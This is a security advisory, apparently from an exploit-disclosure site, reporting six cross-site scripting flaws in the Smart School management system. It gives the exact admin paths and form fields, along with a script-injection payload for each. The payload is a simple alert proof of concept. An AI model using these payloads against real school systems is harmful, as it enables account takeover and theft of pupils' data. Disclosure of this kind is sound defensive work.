Smart School : School Management System > All vers affected

2023.03.05
Credit: Eren Arslan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Smart School : School Management System > All vers affected # Author: @Eawhitehat - Eren Arslan # Vendor: https://smart-school.in/ # Demo available : https://demo.smart-school.in/site/login# # Software Link: https://smart-school.in/ # CVE: N/A # Multiple XSS - XSS 1 : Connect to panel Smart School panel, Paste to search : "><script>alert(/eawhitehat is here/)</script> - XSS 2 : Connect to panel Smart School Panel, Go to /admin/generalcall In the "name" enter the following payload: "><script>alert(/eawhitehat is here/)</script> The rest of the information can be wrong information then save - XSS 3 : Connect to panel Smart School Panel, Go to /admin/dispatch In the "title" enter the following payload: "><script>alert(/eawhitehat is here/)</script> The rest of the information can be wrong information then save - XSS 4 : Connect to panel Smart School Panel, Go to /admin/receive In the "title" enter the following payload: "><script>alert(/eawhitehat is here/)</script> The rest of the information can be wrong information then save - XSS 5 : Connect to panel Smart School Panel, Go to /admin/complaint In the "Complain By" enter the following payload: "><script>alert(/eawhitehat is here/)</script> The rest of the information can be wrong information then save - XSS 6 : Connect to panel Smart School Panel, Go to /admin/visitorspurpose In the "Purpose" enter the following payload: "><script>alert(/eawhitehat is here/)</script> The rest of the information can be wrong information then save


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top